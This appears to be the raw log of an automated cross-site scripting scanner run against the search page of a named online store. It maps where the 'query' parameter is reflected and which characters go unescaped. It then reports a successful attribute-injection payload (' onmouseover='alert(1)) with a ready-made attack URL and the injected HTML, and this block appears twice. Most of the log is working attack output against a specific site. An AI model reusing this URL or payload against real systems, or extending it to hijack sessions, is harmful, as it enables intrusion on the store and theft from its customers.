https://www.earthsunmoon.com/store/cart

GET Params:[1]
['query']
_______________________________________________________________________________________________________
https://www.earthsunmoon.com/store/products/search.php?query=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [2]
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="(uvw&quot;xyz'yxz" onfocus="" />
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="(uvw&quot;xyz'yxz" onfocus="" />

----------------------------------------------------------------------------------
HTML Context: [2]
<title>&quot;(uvw&quot;xyz'yxz&quot; Search | Earth Sun Moon</title>
<span style="color:#e87510;">&ldquo;(uvw&quot;xyz'yxz&rdquo;</span>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.earthsunmoon.com/store/products/search.php?query=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="' onmouseover='alert(1)" onfocus="" />
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="' onmouseover='alert(1)" onfocus="" />
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.earthsunmoon.com/store/products/search.php?query=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="' onmouseover='alert(1)" onfocus="" />
<input type="text" name="query" id="search-text" spellcheck="true"  class="form-control input-md" style="font-size:12px;" placeholder="Find a gift..." value="' onmouseover='alert(1)" onfocus="" />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
